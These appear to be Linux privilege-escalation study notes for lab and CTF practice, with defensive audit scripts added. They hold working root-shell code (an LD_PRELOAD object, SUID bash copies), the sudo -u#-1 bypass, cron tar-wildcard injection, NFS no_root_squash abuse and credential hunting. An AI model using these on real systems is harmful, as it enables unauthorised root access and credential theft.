Linux Privilege Escalation


Last updated 6 months ago

Resources:

  1. Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

  2. Linux Privilege Escalation - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

  3. Checklist - Linux Privilege Escalation - https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist

  4. Sushant 747's Guide (Country dependent - may need VPN) - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

  5. All links and resources found in the course can also be found at the following repository: https://github.com/Gr1mmie/Linux-Privilege-Escalation-Resources

  6. Walkthrough - https://0xsmiley.github.io/2020-07-26-LinuxPrivEsc/

Initial Enumeration

#System Enumeration
hostname
uname -a
cat /proc/version
cat /etc/issue
lscpu
ps aux        #services running
ps aux | grep root
sudo -V

#User Enumeration
whoami
id
sudo -l
cat /etc/sudoers
cat /etc/passwd
cut -d: -f1 /etc/passwd        #usernames only
cat /etc/shadow        #normally readable only by root; if this works, permissions are already broken
history

#Network Enumeration
ifconfig
ip a
ip route
ip neigh    #To view the ARP table
netstat -ano

#Password Hunting
grep -rnwi '/' -e "PASSWORD" --color=always 2>/dev/null
locate password | more
locate pass | more
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null

Exploring Automated Tools

#LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
#LinEnum - https://github.com/rebootuser/LinEnum
#Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester
#Linux Priv Checker - https://github.com/sleventyeleven/linuxprivchecker
#Download linpeas and run it
./linpeas.sh
#Download Linux Exploit Suggester and run it
./linux-exploit-suggester.sh

Kernel Exploits

#Kernel Exploits - https://github.com/lucyoa/kernel-exploits
uname -a
#search for a kernel exploit matching the kernel version we got
#then run the exploit, compiling the code first if needed

Passwords & File Permissions

#Escalation via Stored Passwords
history    #we may find passwords or useful commands
cat .bash_history
su root
grep -rnwi '/' -e "PASSWORD" --color=always 2>/dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
#Download linpeas and run it
./linpeas.sh
#check the files that are in front of us :)

#Escalation via Weak File Permissions
ls -la /etc/passwd
ls -la /etc/shadow
#if these files are readable (or writable) by us we can grab the hashes; refer to the password cracking section

#Escalation via SSH Keys
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
#Generating ssh keys
ssh-keygen -t rsa
#From here we can try to put our public key in a writable authorized_keys file and connect with the matching private key (very rare case)
#If we find any private key we can connect with it directly
#connecting via ssh private key
chmod 600 <private_key>
ssh -i <private_key> <username>@<ip_address>
#Note: public keys are stored in the authorized_keys file

Sudo

#Escalation via Sudo Shell Escaping
#GTFOBins - https://gtfobins.github.io/
#Linux PrivEsc Playground - https://tryhackme.com/room/privescplayground
sudo -l
#By using GTFOBins we can get a shell from the binaries listed

#Escalation via Intended Functionality
sudo -l
#just google the privilege escalation for the service we need
#wget example - https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/

#Escalation via LD_PRELOAD
sudo -l        #works when the output shows env_keep+=LD_PRELOAD
#Write a shared object (shell.c, listed at the end of this section)
nano shell.c
#now compile the code
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
#now run any allowed sudo command with the library preloaded
sudo LD_PRELOAD=/home/usr/shell.so <any_sudo_command>     #sudo LD_PRELOAD=/home/usr/shell.so vim

#Simple CTF TryHackMe Walkthrough
#https://www.hackingarticles.in/simple-ctf-tryhackme-walkthrough/
#dirsearch - https://github.com/maurosoria/dirsearch
#Exploit-DB for Simple CMS - https://www.exploit-db.com/exploits/46635

#CVE-2019-14287
#Exploit-DB for CVE-2019-14287 - https://www.exploit-db.com/exploits/47502
#Sudo Security Bypass [TryHackMe]
#https://martinkubecka.github.io/posts/thm/sudo-security-bypass/
#you may see a rule like this in sudo -l: "hacker ALL=(ALL,!root) /bin/bash"
#you can bypass it using the command below
sudo -u#-1 /bin/bash

#CVE-2019-18634
#Exploit for CVE-2019-18634 - https://github.com/saleemrashid/sudo-cve-2019-18634
#TryHackMe: Sudo Buffer Overflow Walkthrough
#https://r4v4n.medium.com/tryhackme-sudo-buffer-overflow-walkthrough-14e7f5a2a0c7
sudo -V
#now try the exploit if the version you got is vulnerable
//shell.c used by the "Escalation via LD_PRELOAD" step above
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");   //don't inject into the child shell again
    setgid(0);
    setuid(0);                //the sudo process runs as root, so keep uid 0 for the shell
    system("/bin/bash");
}
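A defender-side check for the Sudo section above, added here and not part of the original notes: it takes the version from the first line of sudo -V and the sudoers text as arguments (the sudoers sample is constructed), and reports the three conditions the escalations in this section depend on.

```shell
# Added sudo check, not from the original notes. Given the version from the
# first line of "sudo -V" (e.g. "Sudo version 1.8.27") and sudoers text, it
# reports the three conditions the Sudo section above depends on. Version
# gates are coarse because distributions backport fixes, so treat a hit as
# "read the changelog", not as proof. The sudoers sample is constructed.

# sudo_version_vulnerable VERSION -> prints each CVE fixed after VERSION:
# CVE-2019-14287 (-u#-1 bypass) fixed in 1.8.28, CVE-2019-18634 (pwfeedback
# overflow) fixed in 1.8.26.
sudo_version_vulnerable() {
    major=$(echo "$1" | cut -d. -f1)
    minor=$(echo "$1" | cut -d. -f2)
    rest=$(echo "$1" | cut -d. -f3)       # "27" or "27p1"
    patch=${rest%%p*}
    plevel=${rest#*p}
    [ "$plevel" = "$rest" ] && plevel=0   # no "pN" suffix
    num=$((major * 1000000 + minor * 10000 + patch * 100 + plevel))
    if [ "$num" -lt $((1 * 1000000 + 8 * 10000 + 28 * 100)) ]; then
        echo CVE-2019-14287
    fi
    if [ "$num" -lt $((1 * 1000000 + 8 * 10000 + 26 * 100)) ]; then
        echo CVE-2019-18634
    fi
    return 0
}

# sudoers_findings SUDOERS_TEXT -> one keyword per weak setting:
#   ld_preload_kept  env_keep passes LD_PRELOAD through sudo
#   root_excluded    an "(ALL,!root)" style rule, what CVE-2019-14287 abuses
#   pwfeedback       Defaults pwfeedback, required by CVE-2019-18634
sudoers_findings() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | while IFS= read -r line; do
        case $line in *env_keep*LD_PRELOAD*) echo ld_preload_kept ;; esac
        case $line in *'!root'*) echo root_excluded ;; esac
        case $line in Defaults*pwfeedback*) echo pwfeedback ;; esac
    done
    return 0
}

SAMPLE_SUDOERS='Defaults env_reset, pwfeedback
Defaults env_keep += "LD_PRELOAD"
root ALL=(ALL:ALL) ALL
hacker ALL=(ALL,!root) /bin/bash'

sudo_version_vulnerable 1.8.27
sudoers_findings "$SAMPLE_SUDOERS"
# live: sudo_version_vulnerable "$(sudo -V | head -n1 | awk '{print $3}')"
#       sudoers_findings "$(sudo -l 2>/dev/null)"
```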

SUID

#SUID
find / -perm -u=s -type f 2>/dev/null
#from the result check the permissions
ls -la <command_you_got>        #EX: ls -la /usr/bin/chsh
#Now we can use GTFOBins to exploit
#https://gtfobins.github.io/#+suid
#Write-Up 06-TryHackMe-Vulnversity
#https://infosecwriteups.com/write-up-06-tryhackme-vulnversity-9b5f8e365be8

Other SUID Escalation

#Escalation via Shared Object Injection
find / -type f -perm -04000 -ls 2>/dev/null
#from the result check the permissions
ls -la <command_you_got>        #EX: ls -la /usr/bin/chsh
#check the result by running the commands you got
<command_you_got>      #EX: /usr/bin/chsh
#we trace the binary with strace to see which files it tries to open
strace <command_you_got> 2>&1     #EX: strace /usr/bin/chsh 2>&1
strace <command_you_got> 2>&1 | grep -i -E "open|access|no such file"
#if it tries to load a shared object that does not exist from a path we can write to, we can place our own library there and escalate privileges
#code goes here (the constructor shared object is listed at the end of the next section)
#now we will compile the code
gcc -shared -fPIC -o <missing_library_path> <code_file>.c
#now the library sits at the path we found in the strace output
#now run the command we got and we should have root

#Escalation via Binary Symlinks
#This vulnerability is with nginx < 1.6.2 and the "S" (SUID) bit as well
#Nginx Exploit - https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#from the exploit suggester you may get the nginx exploit as well
dpkg -l | grep nginx
find / -type f -perm -04000 -ls 2>/dev/null
ls -la /var/log/nginx
#now download and run the nginx exploit
./nginxed-root.sh /var/log/nginx/error.log
#now make another connection to the server
ssh <username>@<ip_address>
invoke-rc.d nginx rotate >/dev/null 2>&1
#we will get a root shell in the previous session

#Escalation via Environment Variables (watch the video for better clarity)
env
find / -type f -perm -04000 -ls 2>/dev/null
#run any SUID binaries we got from the above command
#Also run strings on that binary to see which commands it calls without a full path
strings <command_we_got>
echo $PATH
#now we will make a malicious binary with the same name as the command the SUID binary calls (here: service)
printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
echo $PATH
#Now run the command we got previously
//Shared object for the "Escalation via Shared Object Injection" step above
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Capabilities

#Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
#SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/
#Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
getcap -r / 2>/dev/null
#here "ep" means effective and permitted, i.e. the capability is usable by the binary
#Escalation via Capabilities (a binary with cap_setuid can switch to uid 0)
<command_we_got> -c 'import os; os.setuid(0); os.system("/bin/bash")'     #/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
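An audit of getcap output for the capabilities this section is about, added here and not part of the original notes. It handles both the older "path = cap+ep" and the newer "path cap=ep" output formats; the sample output is constructed.

```shell
# Added capability audit, not part of the original notes. It parses
# "getcap -r /" output in both the older "path = cap_a,cap_b+ep" form and
# the newer "path cap_a,cap_b=ep" form and flags capability names that let
# a binary become root or bypass file permissions. The sample is constructed.

DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# cap_findings GETCAP_OUTPUT -> "path: cap_name (full capability string)"
cap_findings() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}
        caps=${line#"$path"}
        caps=${caps#" = "}                  # older libcap format
        caps=${caps#" "}                    # newer libcap format
        oldifs=$IFS; IFS=,
        set -- $caps                        # split "cap_a,cap_b+ep" on commas
        IFS=$oldifs
        for item in "$@"; do
            name=${item%%[+=]*}             # drop the +ep / =ep flag suffix
            for bad in $DANGEROUS_CAPS; do
                if [ "$name" = "$bad" ]; then echo "$path: $name ($caps)"; fi
            done
        done
    done
    return 0
}

SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/tar cap_dac_read_search=ep
/usr/sbin/arping cap_net_raw=ep'

cap_findings "$SAMPLE_GETCAP"       # live: cap_findings "$(getcap -r / 2>/dev/null)"
```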

Scheduled Tasks

#Cron & Timers
cat /etc/crontab
#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

#Escalation via Cron Paths
cat /etc/crontab
#if a job runs a script by name only, cron looks it up in the crontab PATH; if we can create or modify that file we get a root shell with the code below
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /<filename>
chmod +x /<filename>
#check whether /tmp/bash has been created
ls -la /tmp
#once it is there run the command below
/tmp/bash -p
id
whoami

#Escalation via Cron Wildcards (you can watch the video for better understanding)
cat /etc/crontab
#if we find anything running with "tar *" we can use this (the files below go in the directory tar runs in, here /home/user)
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
chmod +x /home/user/runme.sh
touch /home/user/--checkpoint=1
touch '/home/user/--checkpoint-action=exec=sh runme.sh'
/tmp/bash -p
id
whoami

#Escalation via Cron File Overwrites
#if the script cron runs is writable by us, append to it with the command below
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /<filename>
#check whether /tmp/bash has been created
ls -la /tmp
#once it is there run the command below
/tmp/bash -p
id
whoami

#TryHackMe-CMesS Walkthrough
#https://sparshjazz.medium.com/tryhackme-cmess-walk-240847b44f31
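An audit for the three cron weaknesses in this section (relative command paths, writable job scripts, tar on a wildcard), added here and not part of the original notes. The crontab sample is constructed, and the writability check is passed in as a parameter so the audit can be exercised without root.

```shell
# Added cron audit, not part of the original notes. It reads text in the
# /etc/crontab layout (m h dom mon dow user command, or @reboot user command)
# and reports what the Scheduled Tasks section above abuses: a script path
# non-root users can write to, a command run without a full path (resolved
# through the cron PATH), and tar run on a wildcard. Sample is constructed.

world_writable() {                          # exit 0 if $1 exists with the o+w bit
    [ -e "$1" ] && find "$1" -maxdepth 0 -perm -002 | grep -q .
}

# cron_findings CRONTAB_TEXT [WRITABLE_CHECK] -> one finding per line
cron_findings() {
    check=${2:-world_writable}
    set -f                                  # "*" fields must not glob
    printf '%s\n' "$1" | while IFS= read -r line; do
        case $line in ''|'#'*) continue ;; esac
        set -- $line
        case $1 in
            PATH=*) echo "cron PATH: ${1#PATH=}"; continue ;;
            *=*) continue ;;                # other variable assignments
            @*) n=2 ;;                      # @reboot user command
            *) n=6 ;;                       # five time fields plus user
        esac
        [ $# -gt "$n" ] || continue
        shift "$n"
        cmd=$*
        cmdpos=1                            # next word is a command name
        for word in "$@"; do
            if [ "$cmdpos" = 1 ]; then
                case $word in /*|cd) ;; *) echo "relative command: $word" ;; esac
                cmdpos=0
            fi
            case $word in '&&'|'||'|';'|'|') cmdpos=1 ;; esac
            case $word in /*) if "$check" "$word"; then echo "writable: $word"; fi ;; esac
        done
        case $cmd in *'tar '*'*'*) echo "tar wildcard: $cmd" ;; esac
    done
    set +f
    return 0
}

# Constructed sample: user-writable dir first in PATH, relative script, absolute script, tar wildcard job.
SAMPLE_CRONTAB='SHELL=/bin/sh
PATH=/home/user:/usr/local/bin:/usr/bin:/bin
17 * * * * root /usr/bin/run-parts /etc/cron.hourly
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
* * * * * root cd /home/user && tar czf /tmp/backup.tgz *'

cron_findings "$SAMPLE_CRONTAB"             # live: cron_findings "$(cat /etc/crontab)"
```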

NFS Root Squashing

#Escalation via NFS Root Squashing
cat /etc/exports
#if we see no_root_squash, files created as root on a mount of that share keep root ownership (and the SUID bit) on the victim
#run the commands below on the attacker machine as root
showmount -e <victim_ip>
mkdir /tmp/mountme
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mountme
printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x        #SUID bit, set as root on the attacker side
#Run the commands below on the victim machine
cd /tmp
./x
#we will get a root shell
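A check of /etc/exports for the setting this section depends on, added here and not part of the original notes. It flags every host entry exported with no_root_squash and notes whether the export is also rw or open to any host; the exports sample is constructed.

```shell
# Added /etc/exports check, not part of the original notes. Each line is
# "<dir> <host>(<options>) ...". The escalation above needs no_root_squash;
# it is worse when the export is also rw or open to every host (*).
# The sample exports text is constructed.

# exports_findings EXPORTS_TEXT -> "dir host: no_root_squash[,rw][,any-host]"
exports_findings() {
    set -f                                  # "*" host must not glob
    printf '%s\n' "$1" | while IFS= read -r line; do
        case $line in ''|'#'*) continue ;; esac
        set -- $line
        dir=$1; shift
        for spec in "$@"; do
            host=${spec%%\(*}
            opts=${spec#*\(}; opts=${opts%\)}
            case ",$opts," in *,no_root_squash,*) ;; *) continue ;; esac
            tags=no_root_squash
            case ",$opts," in *,rw,*) tags=$tags,rw ;; esac
            if [ "$host" = '*' ]; then tags=$tags,any-host; fi
            echo "$dir $host: $tags"
        done
    done
    set +f
    return 0
}

SAMPLE_EXPORTS='# constructed sample
/srv/share 10.0.0.0/24(ro,sync,root_squash)
/tmp *(rw,sync,no_root_squash)
/home/backup 10.0.0.5(ro,no_root_squash) 10.0.0.6(rw,no_root_squash)'

exports_findings "$SAMPLE_EXPORTS"   # live: exports_findings "$(cat /etc/exports)"
```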

Docker

#UltraTech TryHackMe Walkthrough
#https://www.hackingarticles.in/ultratech-tryhackme-walkthrough/